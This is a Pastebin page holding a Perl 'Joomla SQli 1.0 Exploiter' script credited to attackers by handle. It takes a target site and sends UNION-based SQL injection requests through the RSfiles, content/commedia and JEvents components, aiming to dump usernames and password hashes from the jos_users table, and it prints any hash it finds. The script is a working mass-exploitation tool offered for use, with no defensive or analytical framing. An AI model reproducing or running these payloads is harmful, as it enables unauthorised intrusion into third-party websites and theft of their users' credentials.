Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use IO::Socket::INET;
- use LWP::UserAgent;
- system("clear");
- print "------------------------------------------------------------------------\n";
- print "########################################################################\n";
- print "# Joomla SQli 1.0 Exploiter #\n";
- print "# *Coded By Mauritania Attacker* #\n";
- print "# *Modifed By Mr.GladiatorX207* #\n";
- print "########################################################################\n";
- print "------------------------------------------------------------------------\n\n";
- $target = $ARGV[0];
- $component = $ARGV[1];
- if($target eq '' || $component eq '')
- {
- print "Usage: ./exploit.pl <target> <Method Number> \n";
- print "-----------------------------------\n";
- print " Available Exploits : \n";
- print " 1- Joomla Component RSfiles \n";
- print " 2- Joomla General Sql Injection \n";
- print " 3- Joomla Component JEvents \n";
- print "-----------------------------------\n";
- print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
- exit(1);
- }
- open(FILE, "> contents11.txt");
- if($target !~ /http:\/\//)
- {
- $target = "http://$target";
- }
- sleep 1.5;
- $agent = LWP::UserAgent->new();
- $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
- if($component == 1)
- {
- $host = $target . "/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--";
- print " . . Exploiting Component RSfiles on target $target . . \n\n";
- sleep 1;
- $req = $agent->request(HTTP::Request->new(GET=>$host));
- $content = $req->content;
- if($content =~ /([0-9a-fA-F]{32})/)
- {
- $password = $1;
- print "[+] Password found --> $password :) .\n\n";
- sleep 1;
- }
- else
- {
- print "[-] Password not found :( . \n\n";
- }
- }
- if($component == 2)
- {
- print " . . Exploiting General Sql Injection on target $target . . \n\n";
- sleep 1;
- print " . . Trying different types of injection for this component . . wait please . . \n\n";
- $host = $target . "/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*";
- $host1 = $target . "/index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x3c757365723e, username,0x3c757365723e3c706173733e,count(*),password,0x3c706173733e) from jos_users),null--";
- @hosts = ($host,$host1);
- foreach $hos(@hosts)
- {
- sleep 1;
- $req = $agent->request(HTTP::Request->new(GET=>$hos));
- $content = $req->content;
- if($content =~ /([0-9a-fA-F]{32})/)
- {
- $password = $1;
- print "Password found --> $password :) . \n\n";
- sleep 1;
- }
- else
- {
- print "Password not found :( . \n\n";
- sleep 1;
- }
- }
- }
- if($component == 3)
- {
- print " . . Exploiting Component JEvents on target $target . . \n\n";
- sleep 1;
- print " . . Trying different types of injection for this component . . wait please . . \n\n";
- $host = $target . "/index.php?option=com_events&task=view_detail&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
- $host1 = $target . "/index.php?option=com_events&task=view_year&Itemid=50&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
- $host2 = $target . "/index.php?option=com_events&Itemid=34&task=view_year&month=11&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
- @hosts = ($host,$host1,$host2);
- foreach $hos(@hosts)
- {
- sleep 1;
- $req = $agent->request(HTTP::Request->new(GET=>$hos));
- $content = $req->content;
- if($content =~ /([0-9a-fA-F]{32})/)
- {
- $password = $1;
- print "Password found --> $password :) . \n\n";
- sleep 1;
- }
- else
- {
- print "Password not found :( . \n\n";
- sleep 1;
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement